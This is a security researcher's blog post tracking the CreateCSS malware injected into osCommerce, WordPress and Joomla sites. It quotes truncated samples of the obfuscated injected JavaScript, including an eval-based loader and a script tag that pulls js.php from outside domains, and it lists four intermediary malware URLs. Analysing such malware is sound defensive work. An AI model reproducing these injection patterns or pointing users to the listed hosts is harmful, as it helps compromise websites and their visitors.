CreateCSS malware update

We have been talking about this CreateCSS malware for a little while, but recently we started to see a shift on how the attackers are using it.

*If you don’t remember what it is, the CreateCSS malware has been used to infect thousands of osCommerce sites over the last 3 or 4 weeks. It got this name because it tries to disguise itself as a valid javascript function to create CSS entries.

Anyway, in previous versions of the malware it would infect the sites with the following piece of code:

<script>function createCSS(selector,declaration)
{
var ua=navigator.userAgent.toLowerCase();
var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.te..
.. multiple lines..


But lately, instead of including the full malware code on the vulnerable sites, the attackers started to link to intermediary domains where the malware itself would be called. We are also seeing multiple variations of the malware, now called the lols, absrbwa, etc. Plus, we are also seeing it on all types of sites (WordPress based, Joomla based, etc). Example of code added to hacked sites:

<script type="text/javascript" src="http://inter-war.pl/js.php">..

These are some of the domains being used as intermediaries:

http://inter-war.pl/js.php
http://bnknews.ru/js.php
http://avspormarket.com/js.php
http://johndocphotography.com/js.php

And sample of some of the variations:

var date=new Date();function lols(){return true}
window.onerror=lols;function getXmlHttp(){var xmlhttp;try{xmlhttp=…
if(!xmlhttp&&typeof XMLHttpRequest!=’undefined’){xmlhttp=new XMLHttpRe..

v=16;date=new Date();try{var req=getXmlHttp();req.onreadystatechange=function(){if(req.readyState==1){absrbwa();}};req.open(‘GET’,’http://google.com/’,true);req.send(null);}catch(e){}

var y=false;function absrbwa(){if(y)return;y=true;var k=typeof this.title; ev= eval;var cont=ev(‘u144,0.5625….6.75,1600,2.5,1632,2.5625,944,0.8125,144,0.5625,2000]’….
ev(s);}

The malware keeps changing, but we are tracking them and making sure our clients are protected.


Site hacked? Infected with malware? Blacklisted? Yes, we clean up and monitor web sites.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This